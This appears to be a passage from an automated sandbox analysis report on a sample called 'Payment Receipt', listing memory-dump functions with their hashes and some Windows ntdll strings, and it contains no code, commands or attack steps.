                                                                      • Opcode Fuzzy Hash: 1c478525b07cbf437296385a9a03ca72110a865f523e49cc98d561ab024dff1c
                                                                      • Instruction Fuzzy Hash: DE900225221400020545B558060450B0485F7D7361399C419F2816990CC761C9795321
                                                                      Function 015E2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: acfc12ad81d81229b1b6f92d0f336eb6cfd1308c4310275d81b4921e87cf54c9
                                                                      • Instruction ID: dd58f21ec59b52031ce87f5913dc17aad6f4156e0f3a5d5b583d08ba80b3dd7d
                                                                      • Opcode Fuzzy Hash: acfc12ad81d81229b1b6f92d0f336eb6cfd1308c4310275d81b4921e87cf54c9
                                                                      • Instruction Fuzzy Hash: D29002A1201540924900B2588404B0A4545E7E1211B59C41AE2454960CC665C9659235
                                                                      Function 015E2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e9076287c5dd130fc5059f7405ea8df75628fc9701ba1ef9f02754a202552fe
                                                                      • Instruction ID: c360d13b1aa07eecf759689180e49c5fd820626c9539402066adfb871a3a5da9
                                                                      • Opcode Fuzzy Hash: 0e9076287c5dd130fc5059f7405ea8df75628fc9701ba1ef9f02754a202552fe
                                                                      • Instruction Fuzzy Hash: 2A90022921340002D5807158540860A0045E7D2212F99D819A1415958CCA55C97D5321
                                                                      Function 015E2D00 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 201c64ee9fb9dd8a6629e3865507532926fae8164b32dc3eafbb3fe24a0df28d
                                                                      • Instruction ID: 1630573b802174b7b3c74e1393f28340896bcb95a28589d1b2fc556de0791573
                                                                      • Opcode Fuzzy Hash: 201c64ee9fb9dd8a6629e3865507532926fae8164b32dc3eafbb3fe24a0df28d
                                                                      • Instruction Fuzzy Hash: E390022120544442D50075585408A060045E7D1215F59D415A2464995DC775C965A231
                                                                      Function 015E2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7f7b6da07615d885aede9b908f31f9c1ef784f820c56a045e3c221267342fb66
                                                                      • Instruction ID: f8d1a74bff9db89bd23e2012b10e3ea3adc276b4297d855ce802f05e4bdaca93
                                                                      • Opcode Fuzzy Hash: 7f7b6da07615d885aede9b908f31f9c1ef784f820c56a045e3c221267342fb66
                                                                      • Instruction Fuzzy Hash: 1F90022130140003D540715854186064045F7E2311F59D415E1814954CDA55C96A5322
                                                                      Function 015E2DD0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d1e3aef3fa6c0c960e85f2596305ba08debdc88199295c9512731a16715cfde
                                                                      • Instruction ID: b80dbb9a21f128c9a447c68ac2a862c4d73916438f4d5fc71643ed023c7e1f3b
                                                                      • Opcode Fuzzy Hash: 8d1e3aef3fa6c0c960e85f2596305ba08debdc88199295c9512731a16715cfde
                                                                      • Instruction Fuzzy Hash: A0900221242441525945B15844045074046F7E1251799C416A2814D50CC666D96AD721
                                                                      Function 015E2DB0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 059d8e77bd0761c21c2715869ae28828f313bd634f7e4db1e178a2067cea6b2d
                                                                      • Instruction ID: 9622fa0ae5fbc3dcb18f5f910445527bfa2c4304d50526a5c789e25d437f9afd
                                                                      • Opcode Fuzzy Hash: 059d8e77bd0761c21c2715869ae28828f313bd634f7e4db1e178a2067cea6b2d
                                                                      • Instruction Fuzzy Hash: 4F90023124140402D541715844046060049F7D1251F99C416A1824954EC795CB6AAB61
                                                                      Function 015E2C60 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f425856d75f902c976536d1418c9dccae26d6f05f3ffe5229524983ec5b2d72
                                                                      • Instruction ID: 1278b8da2db693a8db0366ff188dda21bdc2bec349a29221d4e255824f959ef5
                                                                      • Opcode Fuzzy Hash: 8f425856d75f902c976536d1418c9dccae26d6f05f3ffe5229524983ec5b2d72
                                                                      • Instruction Fuzzy Hash: 4990023120140842D50071584404B460045E7E1311F59C41AA1524A54DC755C9657621
                                                                      Function 015E2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d8f6420bdc23e5df7fd6569fc547e67f5c24eb711dbd134dbdf7ee6849cd838
                                                                      • Instruction ID: 66a78f29bbf1fccc795b8f6b7463a6d6de38761a84739956f80b839d174a8fb5
                                                                      • Opcode Fuzzy Hash: 4d8f6420bdc23e5df7fd6569fc547e67f5c24eb711dbd134dbdf7ee6849cd838
                                                                      • Instruction Fuzzy Hash: 9490022160540402D540715854187060055E7D1211F59D415A1424954DC799CB6967A1
                                                                      Function 015E2CF0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 26d1e2fb5f23538e30e83d295f66b93dd9fe3949ddc632b00698e2795b96bba4
                                                                      • Instruction ID: 460ff14e2501f4bf663d63dd26bf631d0fba57a67fad69e6fe7f0067281c15ed
                                                                      • Opcode Fuzzy Hash: 26d1e2fb5f23538e30e83d295f66b93dd9fe3949ddc632b00698e2795b96bba4
                                                                      • Instruction Fuzzy Hash: F190023120140403D500715855087070045E7D1211F59D815A1824958DD796C9656221
                                                                      Function 015E2CA0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7abb66835b867c8b763445104fda1915eb056d18efa8453181a0ed38e5ece5ef
                                                                      • Instruction ID: 313da631dc90c17d997dfa02c949b8b6be696d450951c6a56377f47678f56c87
                                                                      • Opcode Fuzzy Hash: 7abb66835b867c8b763445104fda1915eb056d18efa8453181a0ed38e5ece5ef
                                                                      • Instruction Fuzzy Hash: CB90023120140402D500759854086460045E7E1311F59D415A6424955EC7A5C9A56231
                                                                      Function 015E2F60 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 07b21c9c9f4cab476d044b7a59e57905448de7150d97a026fcf2c245d6d42725
                                                                      • Instruction ID: a47c0ab1a1240ec7f3331eff7beae05bf571bcfb2f81fa5740a8d75a6d362347
                                                                      • Opcode Fuzzy Hash: 07b21c9c9f4cab476d044b7a59e57905448de7150d97a026fcf2c245d6d42725
                                                                      • Instruction Fuzzy Hash: 9290026121140042D504715844047060085E7E2211F59C416A3554954CC669CD755225
                                                                      Function 015E2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 37ac3e1f4f9a80171be43d2a2abddf4151378c2b9eb048b4e322f8dc68ba4762
                                                                      • Instruction ID: 17f1f69718f42ac034ccc462c7b7353c955d158648946190f5b963f55bf28dbc
                                                                      • Opcode Fuzzy Hash: 37ac3e1f4f9a80171be43d2a2abddf4151378c2b9eb048b4e322f8dc68ba4762
                                                                      • Instruction Fuzzy Hash: 1B90026134140442D50071584414B060045E7E2311F59C419E2464954DC759CD666226
                                                                      Function 015E2FE0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6146b53a90b08ef6d08745c93f030a5986adafe104908404ea0ad90fd539c3b0
                                                                      • Instruction ID: 6ae5b225b006c9b8aff1df121d1ff3b3d29e0d885b0966efc88e9848db14d20e
                                                                      • Opcode Fuzzy Hash: 6146b53a90b08ef6d08745c93f030a5986adafe104908404ea0ad90fd539c3b0
                                                                      • Instruction Fuzzy Hash: 3A900221211C0042D60075684C14B070045E7D1313F59C519A1554954CCA55C9755621
                                                                      Function 015E2F90 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fd060379eb2f1bb65f213dadb96c224c123d0bb716caf54e3d2a8180961166e0
                                                                      • Instruction ID: cda687ccf70b5fdc325429613bdf85ff642804ccbdd53906eb6502b118c3bc38
                                                                      • Opcode Fuzzy Hash: fd060379eb2f1bb65f213dadb96c224c123d0bb716caf54e3d2a8180961166e0
                                                                      • Instruction Fuzzy Hash: E890023120180402D5007158481470B0045E7D1312F59C415A2564955DC765C9656671
                                                                      Function 015E2FB0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: de2751416e27a85890c2dac091f4e74a46b91892be33028c96814616202a159c
                                                                      • Instruction ID: 45cf80b88893e66c4f6b7bf1b928fb144a20d4451cf405e7ab94a075b3325e85
                                                                      • Opcode Fuzzy Hash: de2751416e27a85890c2dac091f4e74a46b91892be33028c96814616202a159c
                                                                      • Instruction Fuzzy Hash: C6900221601400424540716888449064045FBE2221759C525A1D98950DC699C9795765
                                                                      Function 015E2FA0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6663065a2335922397552c71e41ee26ee9a2778ebf0d339831bad950e05a391a
                                                                      • Instruction ID: 851ff09026d3d419d89018b763a224e1d2409b7543577f1431cf08150d3e48ce
                                                                      • Opcode Fuzzy Hash: 6663065a2335922397552c71e41ee26ee9a2778ebf0d339831bad950e05a391a
                                                                      • Instruction Fuzzy Hash: 6990023120180402D500715848087470045E7D1312F59C415A6564955EC7A5C9A56631
                                                                      Function 015E2E30 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 35a80261d14cd4abbc7b6bf1f8b2f4f55fd28432e12a8f78728290228a03ea2a
                                                                      • Instruction ID: 04d5aac6ba1d06dc331bb2c5194a38e57d0a4f26e600823f61eeb9495919b5c0
                                                                      • Opcode Fuzzy Hash: 35a80261d14cd4abbc7b6bf1f8b2f4f55fd28432e12a8f78728290228a03ea2a
                                                                      • Instruction Fuzzy Hash: 4E90022130140402D502715844146060049E7D2355F99C416E2824955DC765CA67A232
                                                                      Function 015E2EE0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ecbfdca68264873a2784261b44a6c42ad31c0db0d5aa443b6d3b61e9814c945
                                                                      • Instruction ID: 73cb450efdaa118c992c9d7a8edef67ab9ca8d804092ff50a0341cb978ca0db9
                                                                      • Opcode Fuzzy Hash: 6ecbfdca68264873a2784261b44a6c42ad31c0db0d5aa443b6d3b61e9814c945
                                                                      • Instruction Fuzzy Hash: 2390026120180403D540755848046070045E7D1312F59C415A3464955ECB69CD656235
                                                                      Function 015E2E80 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 099f26de2676e9cac673516a4c2a52fd6440c2869945f9bc5eee4e2b922badf3
                                                                      • Instruction ID: df5e6c92caff67f8038d4ca0bdf73e1cc1f0d34029727014a295ea2398930705
                                                                      • Opcode Fuzzy Hash: 099f26de2676e9cac673516a4c2a52fd6440c2869945f9bc5eee4e2b922badf3
                                                                      • Instruction Fuzzy Hash: 5990022160140502D50171584404616004AE7D1251F99C426A2424955ECB65CAA6A231
                                                                      Function 015E2EA0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fdc87de22c98723c0a25403933ba7f987e3a700f6b22cf9a07de228556e39139
                                                                      • Instruction ID: 2181060ba03b64e4a85f407e5eb14a0ccd8b2a3505a2c6f6d21b4081caae3fd9
                                                                      • Opcode Fuzzy Hash: fdc87de22c98723c0a25403933ba7f987e3a700f6b22cf9a07de228556e39139
                                                                      • Instruction Fuzzy Hash: 5F90027120140402D540715844047460045E7D1311F59C415A6464954EC799CEE96765
                                                                      Function 015E3010 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ec50d3fe3aaa522044bbae71e914dc74e69c1e156baec55f4e38077cbca42883
                                                                      • Instruction ID: afa0988c0c8fed295e4140ccb36ce5b5a4b6534d45a32e8ecb390e5dd0cc3959
                                                                      • Opcode Fuzzy Hash: ec50d3fe3aaa522044bbae71e914dc74e69c1e156baec55f4e38077cbca42883
                                                                      • Instruction Fuzzy Hash: 3990022120184442D54072584804B0F4145E7E2212F99C41DA5556954CCA55C9695721
                                                                      Function 015E3090 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7e1e95b324f1bfe9c0a39f048c18015398d376437f8b2c7e0aa5fd98c7297c8
                                                                      • Instruction ID: 30ffc61e4513a1bc317213b5e8af9bba14760cfa97542d4ee73aa2ccc25ba936
                                                                      • Opcode Fuzzy Hash: b7e1e95b324f1bfe9c0a39f048c18015398d376437f8b2c7e0aa5fd98c7297c8
                                                                      • Instruction Fuzzy Hash: 4890022124140802D540715884147070046E7D1611F59C415A1424954DC756CA7967B1
                                                                      Function 015E39B0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3c9ef9925ac3fe4842dd6fe82b206730aea3742623361fc8927f906d588901d2
                                                                      • Instruction ID: c8f4c5f070e7d877ee5dc7c750da11c88bb36362a26e58fe1b9c7f64a13724bf
                                                                      • Opcode Fuzzy Hash: 3c9ef9925ac3fe4842dd6fe82b206730aea3742623361fc8927f906d588901d2
                                                                      • Instruction Fuzzy Hash: 1190022124545102D550715C44046164045F7E1211F59C425A1C14994DC695C9696321
                                                                      Function 015E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: 77b8beae4a28986b96b67566907d6afa8240a6c534fa2fe420176292c5d37bc4
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Function 015E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: 330c1ad558e58612efa87d7167b275dc8ec98c666b876f25348a944aa08fd141
                                                                      • Instruction ID: 1086b1e93a157f635e3547459174d4960ddaed1900142110c391427b14a4d478
                                                                      • Opcode Fuzzy Hash: 330c1ad558e58612efa87d7167b275dc8ec98c666b876f25348a944aa08fd141
                                                                      • Instruction Fuzzy Hash: 985116B6E04256AFCB15DFAC8C8497EFBFCBB48240B548169F455DB649D334DE4087A0
                                                                      Function 01652410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: 00cfebeb43dede21c6cbb94e61292669edac3947fdd2d9f2393dcbca8799a58a
                                                                      • Instruction ID: 25880c8c99db5c2caf385e76717894a4c3adbd8574b40d1feb5fd1783398754a
                                                                      • Opcode Fuzzy Hash: 00cfebeb43dede21c6cbb94e61292669edac3947fdd2d9f2393dcbca8799a58a
                                                                      • Instruction Fuzzy Hash: 2D51E675A00646EECB64DF6CCCA097EBBF9EB44204F04845DE9D6D7642E7B4DA408760
                                                                      Function 015D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • ExecuteOptions, xrefs: 016146A0
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016146FC
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01614725
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01614787
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01614655
                                                                      • Execute=1, xrefs: 01614713
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01614742
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      • Opcode ID: 3df0f738fcf051c52f9863b83bbb06b36a9b3ba543be2226ed3df548dcc35fc9
                                                                      • Instruction ID: 3e3af68dcfec34329da07cc4a737dba287b182ec3f5d4faacc26ed7f564bcd3b
                                                                      • Opcode Fuzzy Hash: 3df0f738fcf051c52f9863b83bbb06b36a9b3ba543be2226ed3df548dcc35fc9
                                                                      • Instruction Fuzzy Hash: FB510A31A0021A7AEF21EAADDC85FAD7BB8FF59708F140499D505AF181EB709A41CF50
                                                                      Function 01676940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                      • Instruction ID: c3d9a0ad121311c15e6bac2221be187e4645d4cbbee304d686ae8ec8fd646ba7
                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                      • Instruction Fuzzy Hash: AE022571508742AFE309DF18C894A6BBBE5FFD8704F04896DF9898B264DB31E905CB52
                                                                      Function 015EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 1302938615-699404926
                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                      • Instruction ID: e1238378e3c1e77f0c3316ecc386b3fa13d3cec6074cdffeb004e94b30e5a8f9
                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                      • Instruction Fuzzy Hash: 7581E170E4524A8EEF2D8E6CC8587FEBBF1BF45322F18465AD851AF691C7308840CB51
                                                                      Function 016520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$[$]:%u
                                                                      • API String ID: 48624451-2819853543
                                                                      • Opcode ID: 2905ebc795567ab577073a88ce364ad14b4c7e0c7208a1d6eed577e5a7b97f20
                                                                      • Instruction ID: c842170e35986ad51c37ec74d1d55b2c52a8e06e595a5fe0a8b6256c5b42a2e1
